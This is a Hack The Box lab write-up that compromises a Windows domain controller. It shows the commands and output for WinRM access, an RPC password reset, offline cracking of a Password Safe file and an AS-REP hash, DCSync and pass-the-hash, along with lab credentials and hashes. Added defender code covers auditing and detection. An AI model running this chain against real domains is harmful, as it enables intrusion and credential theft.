Mira is cute.
Starting a new series: HTB lab live walkthroughs.
This is mainly a record of what I actually did; experts, please go easy on me.
This box is a Windows domain controller. Let's see what vulnerabilities it has.
Information gathering
Open with the classic nmap combo:
nmap --unprivileged -oA ./result/ -Pn -p- -sV -vv <IP>  # scan all ports and identify the service on each
nmap --unprivileged --script=vuln -p<open_port1>,<open_port2>,<open_port3> <IP>  # nmap's built-in vuln scripts, go!
Result
Initiating NSE at 22:50
Completed NSE at 22:50, 2.76s elapsed
Nmap scan report for 10.10.11.42
Host is up, received user-set (0.37s latency).
Scanned at 2024-12-25 22:49:29 中国标准时间 for 74s
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-12-25 21:35:22Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: D:\Program Files (x86)\Nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.64 seconds
PS C:\Users\20232\Desktop>
So this is a domain controller with the WinRM service enabled, and the box description hands us an initial account, so the intended path is clearly to attack the DC itself.
Olivia: initial account
Getting a shell
WinRM (5985) is exposed, so we use the evil-winrm tool to get in.
┌──(kali㉿DESKTOP-7DDB89Q)-[/mnt/c/Users/20232/Desktop]
└─$ evil-winrm -i 10.10.11.42 -u 'Olivia' -p 'ichliebedich'
╔╗Evil-WinRM shell v3.7╔╗
╔╗Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine╔╗
╔╗Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion╔╗
╔╗Info: Establishing connection to remote endpoint╔╗
*Evil-WinRM* PS C:\Users\olivia\Documents>
That gives us a fully interactive PowerShell session.
In-domain information gathering and analysis
This is where the BloodHound analysis tool comes in. It doesn't ship any exploits of its own, but it helps us analyze the relationships between the various users and points out a path to the holy Administrator.
Here I'm using the .NET collector, SharpHound.exe, which is open source at https://github.com/BloodHoundAD/SharpHound
You can also load the PowerShell script into memory remotely and run it there, but here I'll just
*Evil-WinRM* PS C:\Users\olivia\Documents> upload SharpHound.exe
╔╗Info: Uploading /mnt/c/Users/20232/Desktop/SharpHound.exe to C:\Users\olivia\Documents\SharpHound.exe╔╗
╔╗Data: 2076672 bytes of 2076672 bytes copied╔╗
╔╗Info: Upload successful!╔╗
*Evil-WinRM* PS C:\Users\olivia\Documents> .\SharpHound.exe -c all --ZipFileName output.zip
*Evil-WinRM* PS C:\Users\olivia\Documents> ls
Directory: C:\Users\olivia\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/25/2024 1:52 PM 25242 20241225135232_BloodHound.zip
-a---- 12/25/2024 1:54 PM 25417 20241225135403_output.zip
-a---- 12/25/2024 1:54 PM 1428 NDI3ZmMyMGItNzc4Ny00MzE1LTllNDItYTM4YTEzYjcyZDFj.bin
-a---- 12/24/2024 3:02 PM 770273 PowerView.ps1
-a---- 12/25/2024 1:50 PM 1557504 SharpHound.exe
*Evil-WinRM* PS C:\Users\olivia\Documents> download 20241225135403_output.zip
╔╗Info: Downloading C:\Users\olivia\Documents\20241225135403_output.zip to 20241225135403_output.zip╔╗
Progress: 100% : |▓▓▓▓▓▓▓▓▓▒|
Just import this into the BloodHound GUI. What? You don't have the BloodHound GUI yet? Why not just apt install it?
Michael: pivot account one
Abusing MSRPC (password reset)
┌──(root㉿kali)-[/HTB/Administrator]
└─# rpcclient -U michael 10.10.11.42
Password for [WORKGROUP\michael]:
rpcclient $> setuserinfo2 benjamin 23 'benjamin'
rpcclient $> exit
A side note on MSRPC
In real engagements MSRPC is not only good for changing passwords; it can also be used for further information gathering:
For example:
# connect to the target
rpcclient -U admin%password 192.168.1.100
# enumerate all users
enumdomusers
# query details of a specific user (by RID)
queryuser 1001
# enumerate all groups
enumdomgroups
# query details of a specific group (by RID)
querygroup 512
# list all shares
netshareenum
# query domain information
querydominfo
# get server information
srvinfo
And that's not all: this port also supports remote registry modification and WQL queries, enough material for a separate article. I won't go any further here for lack of space.
benjamin: pivot account two
After trying everything, I found that only the FTP service would let me log in.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ftp benjamin@10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||54544|)
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||54546|)
125 Data connection already open; Transfer starting.
100% |**************************************************| 952 1.63 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (1.15 KiB/s)
ftp> exit
221 Goodbye.
After some searching, this turns out to be a password database backup file; the project is: Releases · pwsafe/pwsafe
But decrypting it directly requires a master password, so what now? We bring in hashcat with rockyou.txt to brute-force it:
┌──(kali㉿DESKTOP-7DDB89Q)-[~]
└─$ hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
tekieromucho
That yields three passwords straight away, but only emily's works, so we can get in over WinRM as the emily user.
alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
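What hashcat mode 5200 is actually testing against Backup.psafe3 is the Password Safe V3 header: a 32-byte salt, an iteration count, and SHA-256 of the stretched key. The example below is added here and is not code from the original post or from the pwsafe project; it reimplements the V3 key-stretching scheme from the published format description, builds a constructed header (not the bytes of Backup.psafe3), checks candidate passphrases the way a cracker does, and reports whether the iteration count is below the format's stated 2048 minimum (that floor is an assumption used for the audit).

```python
# Added example (not from the original post or the pwsafe project): the Password
# Safe V3 header verification that hashcat -m 5200 performs per candidate, plus a
# defender-side audit of the iteration count. All inputs below are constructed.
import hashlib
import hmac
import struct
from typing import Optional

PWS3_TAG = b"PWS3"
PWS3_MIN_ITER = 2048  # assumed floor: the V3 format's stated minimum iteration count


def stretch_key(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """V3 key stretching: X0 = SHA256(P || SALT); Xi = SHA256(X(i-1)); P' = X_ITER."""
    x = hashlib.sha256(passphrase + salt).digest()
    for _ in range(iterations):
        x = hashlib.sha256(x).digest()
    return x


def build_header(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """First 72 bytes of a V3 file: TAG, 32-byte SALT, 4-byte little-endian ITER, H(P')."""
    if len(salt) != 32:
        raise ValueError("salt must be 32 bytes")
    h_pprime = hashlib.sha256(stretch_key(passphrase, salt, iterations)).digest()
    return PWS3_TAG + salt + struct.pack("<I", iterations) + h_pprime


def parse_header(blob: bytes):
    """Return (salt, iterations, H(P')). These three values are all an offline guesser needs."""
    if blob[:4] != PWS3_TAG or len(blob) < 72:
        raise ValueError("not a Password Safe V3 header")
    salt = blob[4:36]
    iterations = struct.unpack("<I", blob[36:40])[0]
    return salt, iterations, blob[40:72]


def check_passphrase(blob: bytes, candidate: bytes) -> bool:
    """One candidate check: the computation a cracker repeats for every wordlist entry."""
    salt, iterations, h_pprime = parse_header(blob)
    derived = hashlib.sha256(stretch_key(candidate, salt, iterations)).digest()
    return hmac.compare_digest(derived, h_pprime)


def first_match(blob: bytes, candidates) -> Optional[bytes]:
    """Return the first candidate that opens the header, or None."""
    for candidate in candidates:
        if check_passphrase(blob, candidate):
            return candidate
    return None


def audit_iterations(blob: bytes, floor: int = PWS3_MIN_ITER) -> dict:
    """Defender-side check: cost per guess scales linearly with ITER, so a low value is a finding."""
    _, iterations, _ = parse_header(blob)
    return {"iterations": iterations, "below_floor": iterations < floor}


if __name__ == "__main__":
    salt = bytes(range(32))  # constructed, fixed so the run is reproducible
    header = build_header(b"correct horse", salt, 2048)
    print(audit_iterations(header))
    print(first_match(header, [b"123456", b"password", b"correct horse"]))
```

The point for defenders: the header leaks nothing about the stored entries, but the master passphrase is the only thing standing between a copied .psafe3 file and its contents, and 2048 SHA-256 iterations cost about a millisecond per guess on a CPU, so a dictionary word falls to rockyou in seconds no matter what ITER is set to. A long random master passphrase matters far more than the iteration count.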
emily user (user-level access)
Attempt: throw every kernel exploit at it with msf
Here I just ran
msfconsole
use post/multi/recon/local_exploit_suggester
setg session 1
run
It turned out that not a single one of them worked, so the only way to escalate was to attack the domain controller itself, guided by the BloodHound analysis.
After stumbling over some tool-configuration issues, I eventually got a hash out of it:
┌──(kali㉿kali)-[~/Desktop/targetedKerberoast]
└─$ GetNPUsers.py administrator.htb/emily -dc-ip 10.10.11.42 -outputfile ethan.txt -format hashcat
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
Name MemberOf PasswordLastSet LastLogon UAC
----- -------- -------------------------- --------- --------
ethan 2024-10-12 16:52:14.117811 <never> 0x410200
/home/kali/.local/bin/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$ethan@ADMINISTRATOR.HTB:21c554bcc53d51c7d401bbbf59451a0d$4181310479f2f2682eda51b0810e8db26ac8cc0e667f80ba46a2b3a684dd95dbcc93d4b0666009481e19720cf513fa5bdb57cc53aadec3e04ac3427a38d75f7fec484739357cb120ca39c36b140b59192a693770670e19d297a22dc5425c845f4fde7f5994fadef7fadef0457c15172b3dbe7361e85fdd1970b1778bbf1593d69e3ff24c6c61df965d5737f837d05fce8271671cce222e7cf33591bed3882cae3c20b8ceb63858e1c83f759e43e0cdbce1e4ec75940c145a0bfe5c6b2af8da1ee002cebe9e5b1b485d1f3565acc26ff644381c4f09a2e4c8bf12f29b2a9c4ee0cfcc4ebf193a29b745a89a1a6fb43ac5e48b9fb5a198
┌──(kali㉿kali)-[~/Desktop/targetedKerberoast]
└─$
Then on to hashcat:
┌──(kali㉿DESKTOP-7DDB89Q)-[/mnt/c/Users/20232/Desktop]
└─$ hashcat -m 18200 ethan.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i7-12700K, 14945/29954 MB (4096 MB allocatable), 20MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Initializing backend runtime for device #1. Please be patient...
Host memory required for this attack: 5 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5asrep$23$ethan@ADMINISTRATOR.HTB:21c554bcc53d51c7d401bbbf59451a0d$4181310479f2f2682eda51b0810e8db26ac8cc0e667f80ba46a2b3a684dd95dbcc93d4b0666009481e19720cf513fa5bdb57cc53aadec3e04ac3427a38d75f7fec484739357cb120ca39c36b140b59192a693770670e19d297a22dc5425c845f4fde7f5994fadef7fadef0457c15172b3dbe7361e85fdd1970b1778bbf1593d69e3ff24c6c61df965d5737f837d05fce8271671cce222e7cf33591bed3882cae3c20b8ceb63858e1c83f759e43e0cdbce1e4ec75940c145a0bfe5c6b2af8da1ee002cebe9e5b1b485d1f3565acc26ff644381c4f09a2e4c8bf12f29b2a9c4ee0cfcc4ebf193a29b745a89a1a6fb43ac5e48b9fb5a198:limpbizkit
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$ethan@ADMINISTRATOR.HTB:21c554bcc53d5...b5a198
Time.Started.....: Fri Dec 27 16:38:28 2024 (0 secs)
Time.Estimated...: Fri Dec 27 16:38:28 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4546.3 kH/s (1.84ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 20480/14344385 (0.14%)
Rejected.........: 0/20480 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> michelle4
Started: Fri Dec 27 16:38:19 2024
Stopped: Fri Dec 27 16:38:29 2024
┌──(kali㉿DESKTOP-7DDB89Q)-[/mnt/c/Users/20232/Desktop]
└─$
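The reason ethan could be AS-REP roasted is visible in the GetNPUsers.py table above: his UAC column reads 0x410200, and 0x400000 in that value is DONT_REQ_PREAUTH. The example below is added here and is not code from the original post or from Impacket; it decodes a userAccountControl value into flag names, picks out enabled accounts with pre-authentication disabled (the audit a defender would run over a user export), and parses a $krb5asrep$ line to show the encryption type hashcat mode 18200 is built for. The user rows and the hash string are constructed for illustration, not taken from the box.

```python
# Added example (not from the original post or Impacket): decode the UAC bitmask
# GetNPUsers.py prints and parse its $krb5asrep$ output line. Bit values follow
# the userAccountControl definitions; sample rows and hash are constructed.
import re
from typing import Optional

UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002


def decode_uac(value: int) -> set:
    """Names of the known flags set in a userAccountControl value."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


def asrep_roastable(value: int) -> bool:
    """Pre-auth disabled on an enabled account: the KDC returns an AS-REP to anyone who asks."""
    return bool(value & DONT_REQ_PREAUTH) and not value & ACCOUNTDISABLE


# Constructed rows in the shape of the GetNPUsers table: (name, UAC). Only ethan
# matches the box; the other two exist to show the enabled/disabled distinction.
SAMPLE_USERS = [("ethan", 0x410200), ("emily", 0x10200), ("svc-legacy", 0x400202)]


def find_roastable(rows) -> list:
    """Audit helper: accounts a defender should either re-enable pre-auth on or watch closely."""
    return [name for name, uac in rows if asrep_roastable(uac)]


# $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<encrypted part>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<enc>[0-9a-f]+)$"
)


def parse_asrep_hash(line: str) -> Optional[dict]:
    """Split a hashcat-format AS-REP line into its fields; etype 23 means RC4-HMAC."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    etype = int(m["etype"])
    return {
        "etype": etype,
        "rc4": etype == 23,
        "user": m["user"],
        "realm": m["realm"],
        "checksum": m["checksum"],
        "enc_part_bytes": len(m["enc"]) // 2,
    }


# Constructed sample line in the same layout as the GetNPUsers output above.
SAMPLE_HASH = "$krb5asrep$23$ethan@ADMINISTRATOR.HTB:" + "00" * 16 + "$" + "ab" * 40

if __name__ == "__main__":
    print(sorted(decode_uac(0x410200)))
    print(find_roastable(SAMPLE_USERS))
    print(parse_asrep_hash(SAMPLE_HASH))
```

Two things the decoded value tells a defender: DONT_REQ_PREAUTH is the setting to remove (it is rarely needed and is a per-account checkbox, "Do not require Kerberos preauthentication"), and etype 23 in the hash means the ticket was issued with RC4, the cheapest type to guess against; an account that still needs pre-auth disabled should at least have a long random password, and AS-REQ traffic for such accounts can be watched via Event ID 4768 with pre-authentication type 0.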
ethan: domain administrator
According to BloodHound
┌──(kali㉿kali)-[~/Desktop/targetedKerberoast]
└─$ secretsdump.py administrator.htb/ethan:limpbizkit@10.10.11.42 -dc-ip 10.10.11.42 -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
[*] Cleaning up...
┌──(kali㉿kali)-[~/Desktop/targetedKerberoast]
└─$
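Both the rpcclient password reset of benjamin earlier and the secretsdump DCSync just above leave distinctive traces in the DC's Security log: a reset is Event ID 4724 with the subject and target accounts, and DCSync is Event ID 4662 on the domain naming context carrying the DS-Replication-Get-Changes control-access rights. The example below is added here and is not code from the original post or from Impacket; it runs a minimal detection pass over constructed event records. The two replication GUIDs are the real well-known values; the allow-lists and the sample records are assumptions for illustration.

```python
# Added example (not from the original post): flag the two DC-side actions in this
# writeup from constructed Windows Security events. 4724 = password reset by another
# principal (the rpcclient setuserinfo2 step); 4662 with replication rights from a
# non-DC account = DCSync (the secretsdump step). Allow-lists are assumed values.
import re

DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}

# Principals expected to perform these actions; assumed here, tune per environment.
RESET_ALLOWED = {"helpdesk-svc"}
REPLICATION_ALLOWED = {"msol_sync"}  # e.g. an Entra Connect sync account

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed records using the field names the Security log uses.
SAMPLE_EVENTS = [
    {"EventID": 4724, "SubjectUserName": "michael", "TargetUserName": "benjamin"},
    {"EventID": 4724, "SubjectUserName": "helpdesk-svc", "TargetUserName": "emma"},
    {"EventID": 4662, "SubjectUserName": "DC$", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{" + DS_REPL_GET_CHANGES + "}\n\t{" + DS_REPL_GET_CHANGES_ALL + "}"},
    {"EventID": 4662, "SubjectUserName": "ethan", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{" + DS_REPL_GET_CHANGES + "}\n\t{" + DS_REPL_GET_CHANGES_ALL + "}"},
    # a 4662 that is not replication (constructed: read of a user object's class GUID)
    {"EventID": 4662, "SubjectUserName": "emily", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def properties_guids(props: str) -> set:
    """Extract every GUID from the multi-line Properties field, normalised to lowercase."""
    return {g.lower() for g in GUID_RE.findall(props or "")}


def is_machine_account(name: str) -> bool:
    return name.endswith("$")


def check_event(event: dict):
    """Return a finding dict for a suspicious event, else None."""
    eid = event.get("EventID")
    subject = event.get("SubjectUserName", "")
    if eid == 4724 and subject.lower() not in RESET_ALLOWED:
        return {"rule": "password_reset_by_unexpected_principal",
                "subject": subject, "target": event.get("TargetUserName")}
    if eid == 4662:
        rights = properties_guids(event.get("Properties", "")) & REPLICATION_RIGHTS
        if rights and not is_machine_account(subject) and subject.lower() not in REPLICATION_ALLOWED:
            return {"rule": "dcsync_replication_by_non_dc",
                    "subject": subject, "rights": sorted(rights)}
    return None


def detect(events) -> list:
    return [finding for finding in map(check_event, events) if finding]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Two caveats before relying on this: 4662 is only written when "Audit Directory Service Access" is enabled and the domain object's SACL audits control-access rights, and the machine-account test is a weak filter (a compromised DC computer account would pass it), so in practice compare the subject against the known list of domain controllers rather than just the trailing "$". The fix for the underlying problem is the one BloodHound points at: remove the replication rights and the password-reset ACEs that were granted to ordinary users.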
Then get straight in with a pass-the-hash attack:
┌──(kali㉿DESKTOP-7DDB89Q)-[/mnt/c/Users/20232/Desktop]
└─$ evil-winrm -i 10.10.11.42 -u 'administrator' -H 3dc553ce4b9fd20bd016e098d2d2fd2e
╔╗Evil-WinRM shell v3.7╔╗
╔╗Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine╔╗
╔╗Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion╔╗
╔╗Info: Establishing connection to remote endpoint╔╗
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/26/2024 11:24 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop>cat root*
f13bc2dc883aff0db7279e6d70aaf6ec
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Done.